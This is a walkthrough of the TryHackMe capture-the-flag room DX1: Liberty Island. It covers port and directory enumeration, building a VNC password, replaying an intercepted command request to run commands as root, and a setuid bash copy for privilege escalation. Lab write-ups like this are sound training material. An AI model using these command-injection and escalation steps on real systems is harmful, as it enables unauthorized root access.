How to root DX1: Liberty Island – THM – En
Can you help the NSF get a foothold in UNATCO’s system?
DX1: Liberty Island is a medium level CTF proposed by TryHackMe . The web enumeration is instructive in that you have to create your own wordlist. The privilege escalation is a bit complex. It is a good CTF to progress.
Enumeration
Command :
nmap -T5 -p- -sVC 10.10.20.94
There are 3 open ports:
22-SSH
80 – HTTP –
5901 -VNC-
23023 – HTTP – UNATCO Liberty Island – Command/Control
WEB enumeration on port 80
In the robots.txt file, NMAP shows us the presence of the /datacubes directory. When we go there, the site redirects us to this new URLhttp://10.10.20.94/datacubes/0000/
GoBuster
According to the information displayed, these appear to be archived messages. Let’s see if there are others. To do this, with Gobuster, we will parse the archives by going to the /0001 page and then /0002.
Création d’une liste de numéros :
I did this with Excel to save time from a Windows PC. In a text format cell, you have to put 0000 and pull (+) up to 1000.
Then you have to copy the column in the Notepad, then copy-paste its content in a file under Kali which will then be used with Gobuster.
Démonstration en vidéo
Commande :
gobuster dir -u http://10.10.20.94/datacubes/ -w num.txt
We have 6 results. I let you look on what is on the others. I’ll go straight to the last /0451…the most interesting…
/0451
It is explained that the VNC login on jacobson’s machine is composed of « smashthestate » with a hmac’ed key which is present in the « bad actor » list, all converted with the MD5 hashing algorithm.
Bad Actors
The list can be found on the website at this URLhttp://10.10.20.94/badactors.html
The only indication for the username are the initials JL. In the “bad actor” list, the only name with his initials is jlebedev
Création du mot de passe VNC
The website https://www.freeformatter.com/hmac-generator.htmlallows us to calculate the hash of the password.
Only the first 8 characters should be taken.
Initial foothold - VNCVIEWER
Command :
vncviewer 10.10.20.94:5901
Once connected, there is a badactor-list executable on the desktop.
Execution badactor-list
We will run this application to see what happens.
The app does 2 things. It synchronizes at the address http://UNATCO on port 23023 and once the connection is established, it seems to retrieve the list of Bad Actors.
Recovery of badactor-list locally on Kali.
Setting up a web server with python
Command :
python3.8 -m http.server
Recovery on Kali
Command :
wget http://10.10.20.94:8000/badactors-list
Wireshark and Buprsuite
With the help of Wireshark, we will see what is happening at the network level. You must first modify the HOSTS file, so that the application connects to the right place and therefore retrieves the bad actors list.
Once the capture is finished, we will use the http filter to eliminate all frames linked to VNC.
To see the http request in detail, right-click on it and follow http stream.
In the window that is displayed, we retrieve the communication between Kali and the UNTACO server. We can see that there is a directive command that performs a cat on the file badactors.txt on the URL UNATCO:23023
We will retrieve this query and rerun it with BurpSuite
Access to URL 10.10.20.94 :23023
Intercepting the request with BurpSuite
Renvoi de l’interception dans Repeater et y copier la requête vu dans Wireshark.
Return the intercept to BurpSuite and copy the request seen in Wireshark there.
We can see that we are recovering the list of bad actors.
By changing the cat command to the id command, we can see that we have root rights.
Escalation of privilege
The rest then is simple. There are several methods to gain root access.
Command :
Directive : cp /bin/bash /tmp
Directive : cd /tmp
Directive : chmod 7777 /tmp/bash
Then you have to go back to the VNC console, and go to the /tmp folder via the file explorer and run bash through the terminal.
Command :
./bash -p
#
That’s all folks
Thank you for taking the trouble to come to the site to read this Write Up
I hope you found it useful and that it taught you some new things.
Feel free to leave a comment or share this article.
